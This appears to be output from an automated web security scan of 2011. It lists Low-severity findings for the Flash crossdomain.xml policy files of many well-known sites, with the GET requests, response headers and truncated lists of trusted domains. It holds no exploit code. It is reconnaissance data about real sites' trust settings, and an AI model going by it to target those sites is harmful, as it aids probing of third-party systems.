Severity: | Low |
Confidence: | Certain |
Host: | http://www.modelmayhem |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.modelmayhem.com |
HTTP/1.1 200 OK Server: IBSrv 1.0 Date: Sat, 02 Apr 2011 13:34:56 GMT Content-Type: text/xml Connection: close Last-Modified: Tue, 03 Nov 2009 23:44:35 GMT ETag: "c0b934-11f-4778013969ec0 Accept-Ranges: bytes Content-Length: 287 Vary: Accept-Encoding Set-Cookie: BIGipServermodelmayhem <cross-domain-policy> <allow-access-from domain="*.llnwd.net" /> <allow-access-from domain="*.modelmayhem.com" /> <allow-access-from domain="*.ezpservices.com" /> <allow-access-from domain="*.ezprints.com" /> <allow-access-from domain="*.ezpservices.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.moshimonsters |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.moshimonsters.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:45:07 GMT Server: Apache Last-Modified: Wed, 19 Aug 2009 10:48:50 GMT ETag: "7ac712-107-4717c6159c880 Accept-Ranges: bytes Content-Length: 263 Content-Type: application/xml Cache-Control: no-store Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.moshimonsters.com" /> <allow-access-from domain="*.mmcdn.net" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.moviesunl |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.moviesunlimited.com |
HTTP/1.1 200 OK Content-Length: 389 Content-Type: text/xml Last-Modified: Wed, 24 Jun 2009 13:43:34 GMT Accept-Ranges: bytes ETag: "b32792c4d1f4c91:3442" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 13:53:31 GMT Connection: close <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="moviesunlimited.com" /> <allow-access-from domain="*.moviesunlimited.com" /> <allow-access-from domain="movieunlimited.com" /> <allow-access-from domain="*.movieunlimited.com" /> <allow-access-from domain="moviefanfare.com" /> <allow-access-from domain="*.moviefanfare.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.msnbc.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.msnbc.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Wed, 23 Feb 2011 23:37:53 GMT Accept-Ranges: bytes ETag: "801e8fb0b2d3cb1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 13:46:09 GMT Connection: close Content-Length: 3794 <?xml version="1.0"?> <!-- http://www.msnbc.com <cross-domain-policy> <allow-access-from domain="nbcsports.com" /> <allow-access-from domain="nbcsports.msnbc.com" /> <allow-access-from domain="*.nbcsports.com" /> <allow-access-from domain="*.nbcsports.msnbc.com" /> <allow-access-from domain="*.msnbc.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.msn.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.msnbc.msn.com" secure="false" /> ...[SNIP]... <allow-access-from domain="msnbciweb" /> <allow-access-from domain="*.ivillage.com " /> <allow-access-from domain="i.ivillage.com" /> <allow-access-from domain="devi.ivillage.com" /> <allow-access-from domain="*.nbcuni.com " /> <allow-access-from domain="*.newsweek.com"/> <allow-access-from domain="*.washingtonpost.com"/> <allow-access-from domain="*.brightcove.com"/> <allow-access-from domain="*.feedburner.com"/> <allow-access-from domain="msnbc-xpress" /> <allow-access-from domain="www.cnbc.com"/> <allow-access-from domain="*.cnbc.com"/> <allow-access-from domain="widgets.nbcuni.com"/> <allow-access-from domain="*.thenbcagency.com"/> <allow-access-from domain="*.veoh.com"/> <allow-access-from domain="*.imeem.com"/> <allow-access-from domain="*.livejournal.com"/> <allow-access-from domain="*.vox.com"/> <allow-access-from domain="*.sixapart.com"/> <allow-access-from domain="*.reuters.com"/> <allow-access-from domain="*.real.com"/> <allow-access-from domain="*.akamai.net"/> <allow-access-from domain="*.atlasrichmedia.co.au"/> <allow-access-from domain="*.atlasrichmedia.co.uk"/> <allow-access-from domain="*.atlasrichmedia.com"/> <allow-access-from domain="*.redcated"/> <allow-access-from domain="*.eyeblasterwiz.com"/> <allow-access-from domain="*.serving-sys.com"/> <allow-access-from domain="*.Abc.com"/> <allow-access-from domain="*.Abcnews.com"/> <allow-access-from domain="*.Accuweather.com"/> <allow-access-from domain="*.Cbs.com"/> <allow-access-from domain="*.cbsnews.com"/> <allow-access-from domain="*.discovery.com"/> <allow-access-from domain="*.ew.com"/> <allow-access-from domain="*.fox.com"/> <allow-access-from domain="*.foxnews.com"/> <allow-access-from domain="*.ign.com"/> <allow-access-from domain="*.people.com"/> <allow-access-from domain="*.tvguide.com"/> <allow-access-from domain="*.weather.com"/> <allow-access-from domain="*.vh1.com"/> <allow-access-from domain="*.usatoday.com"/> <allow-access-from domain="*.bmg.com"/> <allow-access-from domain="*.bmgmusic.com"/> <allow-access-from domain="*.people.com"/> <allow-access-from domain="*.fluid.nl"/> <allow-access-from domain="*.myspace.com"/> <allow-access-from domain="*.myspacecdn.com"/> <allow-access-from domain="*.newsvine.com"/> <allow-access-from domain="*.stamen.com" /> <allow-access-from domain="64.207.156.207"/> <allow-access-from domain="*.msnbcmedia.msn.com" secure="false" /> ...[SNIP]... <allow-access-from domain="msnbcmedia.msn.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.s-msn.com" /> <allow-access-from domain="*.telemundo.com" /> <allow-access-from domain="*.unicornmedia.com" /> <allow-access-from domain="*.pointroll.com" /> <allow-access-from domain="*.intellitxt.com"/> <allow-access-from domain="*.panachetech.com"/> <allow-access-from domain="*.interpolls.com"/> <allow-access-from domain="*.unicornmedia.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.unicornapp.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.unicornmediabeta.com" secure="false"/> ...[SNIP]... <allow-access-from domain="today.com" /> <allow-access-from domain="*.today.com" /> <allow-access-from domain="*.pointroll.net" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.mybloglog.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.mybloglog.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 12:42:53 GMT P3P: policyref="http://p3p Last-Modified: Mon, 21 Aug 2006 16:30:13 GMT Accept-Ranges: bytes Content-Length: 228 Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.yahoo.com" secure="false" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.mycokerewards |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.mycokerewards.com |
HTTP/1.0 200 OK Server: IBM_HTTP_Server Last-Modified: Mon, 08 Mar 2010 11:29:26 GMT ETag: "404531-3a8-60a69180" Accept-Ranges: bytes Content-Length: 936 Content-Type: text/xml Expires: Sat, 02 Apr 2011 13:35:40 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 02 Apr 2011 13:35:40 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.mycokerewards.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.mcrpointsplus.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.dietcoke.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.sprite.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.fanta.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.drinkvault.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.dasani.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.mycoke.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.dietcoke.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.cokezero.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.us.powerade.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.minutemaid.com" secure="false"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.myheritage.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.myheritage.com |
HTTP/1.0 200 OK Server: Apache/2.2.3 (CentOS) PHP/5.2.9 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 Last-Modified: Tue, 30 Nov 2010 16:11:51 GMT ETag: "8c93c0-78c-7247dfc0" Accept-Ranges: bytes Content-Length: 1932 Content-Type: text/xml Date: Sat, 02 Apr 2011 13:41:03 GMT Connection: close Cache-Control: max-age=86400 Expires: Tue, 22 Mar 2011 08:09:34 GMT <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*.myheritagefiles.com"/> <allow-access-from domain="*.myheritageimages.com"/> <allow-access-from domain="*.myheritage.com"/> <allow-access-from domain="*.myheritageonline.com"/> <allow-access-from domain="*.mhcache.com"/> <allow-access-from domain="*.mhtools.com"/> <allow-access-from domain="*.myheritage.ae"/> <allow-access-from domain="*.myheritage.cn"/> <allow-access-from domain="*.myheritage.co.il"/> <allow-access-from domain="*.myheritage.co.in"/> <allow-access-from domain="*.myheritage.co.kr"/> <allow-access-from domain="*.myheritage.com.br"/> <allow-access-from domain="*.myheritage.com.hr"/> <allow-access-from domain="*.myheritage.com.pt"/> <allow-access-from domain="*.myheritage.com.tr"/> <allow-access-from domain="*.myheritage.com.ua"/> <allow-access-from domain="*.myheritage.cz"/> <allow-access-from domain="*.myheritage.de"/> <allow-access-from domain="*.myheritage.dk"/> <allow-access-from domain="*.myheritage.es"/> <allow-access-from domain="*.myheritage.fr"/> <allow-access-from domain="*.myheritage.gr"/> <allow-access-from domain="*.myheritage.hu"/> <allow-access-from domain="*.myheritage.ir"/> <allow-access-from domain="*.myheritage.it"/> <allow-access-from domain="*.myheritage.jp"/> <allow-access-from domain="*.myheritage.lt"/> <allow-access-from domain="*.myheritage.nl"/> <allow-access-from domain="*.myheritage.no"/> <allow-access-from domain="*.myheritage.pl"/> <allow-access-from domain="*.myheritage.ro"/> <allow-access-from domain="*.myheritage.rs"/> <allow-access-from domain="*.myheritage.sk"/> <allow-access-from domain="*.myheritage.si"/> <allow-access-from domain="*.myheritage.se"/> <allow-access-from domain="69.93.254.120"/> <allow-access-from domain="69.93.254.81"/> <allow-access-from domain="69.93.254.88"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.mylifetime.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.mylifetime.com |
HTTP/1.0 200 OK Server: Apache Last-Modified: Thu, 26 Aug 2010 05:20:42 GMT ETag: "1118e1ad8-6c4-48eb3 Cteonnt-Length: 1732 RealServer: prodweb5 Content-Type: text/xml Cache-Control: no-store Expires: Sat, 02 Apr 2011 13:35:19 GMT Date: Sat, 02 Apr 2011 13:35:19 GMT Content-Length: 1732 Connection: close <cross-domain-policy> <allow-http-request <allow-access-from domain="*.mylifetime.com" secure="false"/> <allow-access-from domain="*.ltcdn.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.brightcove.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.tremormedia.com" secure="false"/> ...[SNIP]... <allow-access-from domain="web1.lifetimetelevision ...[SNIP]... <allow-access-from domain="web2.lifetimetelevision ...[SNIP]... <allow-access-from domain="web3.lifetimetelevision ...[SNIP]... <allow-access-from domain="www.lovespringintern ...[SNIP]... <allow-access-from domain="dev.lovespringintern ...[SNIP]... <allow-access-from domain="prodweb1.lifetimetv.com" secure="false"/> ...[SNIP]... <allow-access-from domain="prodweb2.lifetimetv.com" secure="false"/> ...[SNIP]... <allow-access-from domain="prodweb3.lifetimetv.com" secure="false"/> ...[SNIP]... <allow-access-from domain="prodweb4.lifetimetv.com" secure="false"/> ...[SNIP]... <allow-access-from domain="prodweb5.lifetimetv.com" secure="false"/> ...[SNIP]... <allow-access-from domain="prodweb6.lifetimetv.com" secure="false"/> ...[SNIP]... <allow-access-from domain="prodweb7.lifetimetv.com" secure="false"/> ...[SNIP]... <allow-access-from domain="prodweb8.lifetimetv.com" secure="false"/> ...[SNIP]... <allow-access-from domain="prodweb9.lifetimetv.com" secure="false"/> ...[SNIP]... <allow-access-from domain="www.lifetimetv.com" secure="false"/> ...[SNIP]... <allow-access-from domain="dev.lifetimetv.com" secure="false"/> ...[SNIP]... <allow-access-from domain="www.bunchball.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.natalie.feedroom.com" secure="false"/> ...[SNIP]... <allow-access-from domain="www.facebook.com" secure="false"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.myspace.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.myspace.com |
HTTP/1.1 200 OK Cache-Control: no-cache, must-revalidate, proxy-revalidate Pragma: no-cache Content-Type: text/xml Expires: -1 Last-Modified: Thu, 31 Mar 2011 20:31:08 GMT Accept-Ranges: bytes ETag: "0ceba90e2efcb1:0" Server: Microsoft-IIS/7.5 X-Server: d1bdf6f06cd35da50a6e Set-Cookie: MSCulture=IP=173.193.214 Set-Cookie: SessionDDF2=I9TZrF X-PoweredBy: The Force Date: Sat, 02 Apr 2011 12:37:27 GMT Connection: keep-alive Content-Length: 680 X-Vertical: profileidentities <cross-domain-policy> <allow-access-from domain="*.fimservecdn.com" /> <allow-access-from domain="lads.myspace.cn" /> <allow-access-from domain="*.ilike.com" /> <allow-http-request ...[SNIP]... <allow-access-from domain="*.myspacecdn.com" /> <allow-access-from domain="*.myspace.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.myxer.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.myxer.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:39:18 GMT Server: Microsoft-IIS/7.0 Content-Type: text/xml Last-Modified: Sat, 18 Jul 2009 09:06:49 GMT Accept-Ranges: bytes ETag: "80da2115877ca1:0" X-UA-Compatible: IE=8 Content-Length: 363 Set-Cookie: SERVERID=PW06; path=/ Vary: Accept-Encoding Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.myxer.com" /> <allow-access-from domain="*.myxertones.com" /> <allow-access-from domain="msbsfl.dyndns.org" /> <allow-access-from domain="*.mxr.cc" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.myyearbook.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.myyearbook.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:31:54 GMT Server: Apache Last-Modified: Mon, 28 Sep 2009 08:13:22 GMT ETag: "79e4f3-570-4749edf02cc80 Accept-Ranges: bytes Content-Length: 1392 X-Server-Name: web27 Connection: close Content-Type: text/x-cross-domain X-MyPoolMember: 10.100.10.77 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*.myyearbook.com"/> <allow-access-from domain="*.mybdev.com"/> <allow-access-from domain="*.mybstaff.com"/> <allow-access-from domain="*.coolapps.com"/> <allow-access-from domain="*.mybcdna.com"/> <allow-access-from domain="*.mybcdnb.com"/> <allow-access-from domain="*.mybcdnc.com"/> <allow-access-from domain="*.mybcdnd.com"/> <allow-access-from domain="*.mybcdne.com"/> <allow-access-from domain="*.mybcdnf.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.nascar.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.nascar.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:39:01 GMT Server: Apache Last-Modified: Sat, 05 Jun 2010 16:12:55 GMT Accept-Ranges: bytes Content-Length: 819 Content-Type: application/xml Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.nascar.com" /> <allow-access-from domain="*.sportvision.com" /> <allow-access-from domain="*.cnn.com" /> <allow-access-from domain="*.turner.com" /> <allow-access-from domain="*.cnn.net" /> <allow-access-from domain="*.fedex.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.toptrumps.com"/> <allow-access-from domain="*.toptrumpslive.com"/> <allow-access-from domain="*.officedepotracing.com"/> <allow-access-from domain="*.myspacecdn.com"/> <allow-access-from domain="cdn.eyewonder.com"/> <allow-access-from domain="cdn1.eyewonder.com"/> <allow-access-from domain="apps.eyewonderlabs.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.nationalg |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.nationalgeographic |
HTTP/1.0 200 OK Server: Apache/2.2.3 (Red Hat) Accept-Ranges: bytes Content-Length: 1633 Xonnection: Xeep-Alive Content-Type: text/xml X-Cache-Lookup: HIT from rpc4.int.ngeo.com:80 Cache-Control: max-age=9401 Expires: Sat, 02 Apr 2011 16:04:18 GMT Date: Sat, 02 Apr 2011 13:27:37 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.extremeexplorer.org" secure="false" /> ...[SNIP]... <allow-access-from domain="*.brightcove.com" secure="false" /> ...[SNIP]... <allow-access-from domain="nmp.newsgator.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.ngm.com" secure="false" /> ...[SNIP]... <allow-access-from domain="ngm.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.nationalgeographic.com" secure="false" /> ...[SNIP]... <allow-access-from domain="ngm.typepad.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.googlesyndication.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.google.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.2mdn.net" secure="false" /> ...[SNIP]... <allow-access-from domain="*.thegreenguide.com" secure="false" /> ...[SNIP]... <allow-access-from domain="thegreenguide.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.nationalgeographic.co ...[SNIP]... <allow-access-from domain="*.nationalgeographic.co ...[SNIP]... <allow-access-from domain="*.nationalgeographic.com ...[SNIP]... <allow-access-from domain="*.tremormedia.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.ngeo.com" secure="false"/> ...[SNIP]... <allow-access-from domain="u23dmovie.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.u23dmovie.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.fieldscope.org" secure="false" /> ...[SNIP]... <allow-access-from domain="*.fieldscope.us" secure="false" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.nba.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.nba.com |
HTTP/1.0 200 OK Server: Apache Last-Modified: Mon, 20 Dec 2010 20:43:32 GMT Accept-Ranges: bytes Content-Length: 2010 Content-Type: application/xml Date: Sat, 02 Apr 2011 13:25:13 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.turner.com" /> <allow-access-from domain="*.nba.com" /> <allow-access-from domain="*.wnba.com" /> <allow-access-from domain="*.airplay.com" /> <allow-access-from domain="*.apnwi.com" /> <allow-access-from domain="*.codeandtheory.com" /> <allow-access-from domain="*.equakecreative.com" /> <allow-access-from domain="*.equakecreative2.com" /> <allow-access-from domain="*.facebook.com" /> <allow-access-from domain="*.gmodules.com" /> <allow-access-from domain="*.gsipartners.com" /> <allow-access-from domain="*.gspt.net" /> <allow-access-from domain="*.iamatrailblazersfan.com" /> <allow-access-from domain="*.jivesoftware.com" /> <allow-access-from domain="*.liveworld.com" /> <allow-access-from domain="*.myspace.com" /> <allow-access-from domain="*.nike.com" /> <allow-access-from domain="nba.goodbysilverstein.com" /> <allow-access-from domain="*.onebowerman.com" /> <allow-access-from domain="*.pointroll.com" /> <allow-access-from domain="*.radassembly.com" /> <allow-access-from domain="search.atomz.com" /> <allow-access-from domain="*.synergymedia.net" /> <allow-access-from domain="*.toptrumps.com" /> <allow-access-from domain="*.toptrumpslive.com" /> <allow-access-from domain="*.trinityeffects.com" /> <allow-access-from domain="*.yinteract.com" /> <allow-access-from domain="*.tnt.tv" /> <allow-access-from domain="*.imageg.net" /> <allow-access-from domain="*.dickssportinggoods.com" /> <allow-access-from domain="*.eloqua.com" /> <allow-access-from domain="*.mycavsaccount.com" /> <allow-access-from domain="*.cavfanatic.com" /> <allow-access-from domain="*.attractv.net" /> <allow-access-from domain="*.nbahooptroop.com" /> <allow-access-from domain="127.0.0.1"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.nbc.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.nbc.com |
HTTP/1.0 200 OK Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.10 Last-Modified: Tue, 21 Sep 2010 17:56:56 GMT ETag: "36701c4-bbc-490c8c1 Accept-Ranges: bytes Content-Length: 3004 Wirt: (null) Content-Type: application/xml Cache-Control: max-age=5 Expires: Sat, 02 Apr 2011 13:24:33 GMT Date: Sat, 02 Apr 2011 13:24:28 GMT Connection: close Set-Cookie: ak-mobile-true=no; expires=Sun, 03-Apr-2011 13:24:28 GMT; path=/ Vary: User-Agent <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="blogs.nbc.com" /> <allow-access-from domain="*.nbc.com" /> <allow-access-from domain="*.samantha48616e61.com" /> <allow-access-from domain="chuckssecret.com" /> <allow-access-from domain="www.gold4sex.com" /> <allow-access-from domain="www.chuckssecret.com" /> <allow-access-from domain="itm2083.com" /> <allow-access-from domain="widgets.nbcuni.com" /> <allow-access-from domain="biggestloser.msn.com" /> <allow-access-from domain="*.nbcuni.com" /> <allow-access-from domain="www.biggestloser.msn.com" /> <allow-access-from domain="swf.userplane.com" /> <allow-access-from domain="*.clearspring.com" /> <allow-access-from domain="*.ingaylewetrust.com" /> <allow-access-from domain="external.admin.nbc.nbcuni <allow-access-from domain="127.0.0.1" /> <allow-access-from domain="localhost" /> <allow-access-from domain="*.theparenthoodproject <allow-access-from domain="*.jaylenosgarage.com" headers="*"/> <allow-access-from domain="*.dundermifflininfinity <allow-access-from domain="*.ingaylewetrust.com" headers="*"/> <allow-access-from domain="*.latenightwithjimmy <allow-access-from domain="*.msn.com" headers="*"/> <allow-access-from domain="*.yahoo.com" headers="*"/> <allow-access-from domain="*.unicast.com" headers="*"/> <allow-access-from domain="*.nbcagencywc4.com" headers="*"/> <allow-access-from domain="*.themoreyouknow.com" headers="*"/> <allow-access-from domain="*.adinterax.com"/> <allow-access-from domain="*.dialstar.tv"/> <allow-access-from domain="*.truthseeker5314.com"/> ...[SNIP]... <allow-access-from domain="*.doubleclick.net" secure=" false"/> ...[SNIP]... <allow-access-from domain="*.2mdn.net" secure=" false"/> ...[SNIP]... <allow-access-from domain="*.doubleclick.com" secure=" false"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.nbcnewyork.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.nbcnewyork.com |
HTTP/1.0 200 OK Server: Apache Last-Modified: Sat, 02 Apr 2011 06:18:47 GMT X-Server-Name: sj-c14-r3-u6 Content-Type: text/xml;charset=utf-8 Date: Sat, 02 Apr 2011 14:16:18 GMT Content-Length: 1129 Connection: close <?xml version="1.0" encoding="UTF-8" ?> <cross-domain-policy> <allow-access-from domain="*.nbcbayarea.com"/> <allow-access-from domain="*.nbcchicago.com"/> <allow-access-from domain="*.nbcconnecticut.com"/> <allow-access-from domain="*.nbcdfw.com"/> <allow-access-from domain="*.nbclosangeles.com"/> <allow-access-from domain="*.nbcmiami.com"/> <allow-access-from domain="*.nbcnewyork.com"/> <allow-access-from domain="*.nbcphiladelphia.com"/> <allow-access-from domain="*.nbcsandiego.com"/> <allow-access-from domain="*.nbcwashington.com"/> <allow-access-from domain="*.nbclocalmedia.com"/> <allow-access-from domain="*.theplatform.com"/> <allow-access-from domain="*.clickability.com"/> <allow-access-from domain="*.ftp.clickability.com"/> <allow-access-from domain="widgets.nbcuni.com"/> <allow-access-from domain="services.weatherplus.com"/> <allow-access-from domain="*.thefeast.com"/> <allow-access-from domain="*.client-projects.com"/> <allow-access-from domain="*.edgecastcdn.net"/> <allow-access-from domain="*.thelocalfeast.com"/> <allow-access-from domain="*.2mdn.net"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.netflix.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.netflix.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 12:43:47 GMT Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR DEVa TAIa OUR BUS UNI STA" Cache-Control: private Pragma: no-cache Expires: Fri, 01 Apr 2011 12:43:47 GMT Last-Modified: Thu, 24 Mar 2011 13:33:18 GMT Content-Type: application/xml;charset Content-Length: 89 Set-Cookie: VisitorId=002~bd8992b8 Set-Cookie: nflxsid=222.1301748227374 Set-Cookie: NetflixSession=222 Set-Cookie: vstCnt=1~1~1301723027392; Domain=.netflix.com; Expires=Sun, 01-Apr-2012 12:43:47 GMT; Path=/ Vary: Accept-Encoding Keep-Alive: timeout=15, max=66 Connection: Keep-Alive Set-Cookie: NSC_ED2-xxx=ffffffff <cross-domain-policy> <allow-access-from domain="*.netflix.com"/> </cross-domain-policy> |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.newegg.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.newegg.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Wed, 02 Dec 2009 00:20:07 GMT ETag: "e8c1e633e572ca1:0" Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET x-server-id: 110 X-UA-Compatible: IE=7 Content-Length: 265 Date: Sat, 02 Apr 2011 13:40:39 GMT Age: 0 Connection: keep-alive X-Served-By: E401 X-Ver: 11030801 X-Cache: MISS X-Cache-Hits: 0 Set-Cookie: NSC_xxx.ofxfhh.dpn-WJQ <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.newegg.com" /> <allow-access-from domain="*.newegg.ca" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.newport-news |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.newport-news.com |
HTTP/1.0 200 OK Server: Microsoft-IIS/5.0 X-Powered-By: ASP.NET Content-Type: text/xml Accept-Ranges: bytes Last-Modified: Tue, 09 Mar 2010 18:43:28 GMT ETag: "47f4cb68b8bfca1:1329" Content-Length: 385 Date: Sat, 02 Apr 2011 13:56:03 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="pm.allurent.net"/> <allow-access-from domain="*.pm.allurent.net"/> <allow-access-from domain="*.shared.allurent.net"/> <allow-access-from domain="*.newport-news.com ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.newsvine.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.newsvine.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:44:28 GMT Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Last-Modified: Tue, 19 Oct 2010 20:02:49 GMT ETag: "d5c01d-191-492fdc6f26c40 Accept-Ranges: bytes Content-Length: 401 Keep-Alive: timeout=3, max=993 Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.newsvine.com" /> <allow-access-from domain="*.msn.com" /> <allow-access-from domain="*.msnbc.com" /> <allow-access-from domain="*.fluid.nl" /> <allow-access-from domain="64.207.156.207" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.newsweek.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.newsweek.com |
HTTP/1.1 200 OK Age: 0 Content-Type: application/xml Date: Sat, 02 Apr 2011 13:26:37 GMT ETag: "132801d-1ce-49fb58d Last-Modified: Wed, 30 Mar 2011 16:20:15 GMT Server: Apache Vary: Accept-Encoding Via: 1.1 varnish X-Cacheable: YES X-Varnish: 2022418695 Content-Length: 462 Connection: Close <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy xmlns:xsi="http://www.w3 ...[SNIP]... <allow-access-from domain="*.newsweek.com"/> <allow-access-from domain="*.brightcove.com"/> <allow-access-from domain="*.google-analytics.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.nfl.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.nfl.com |
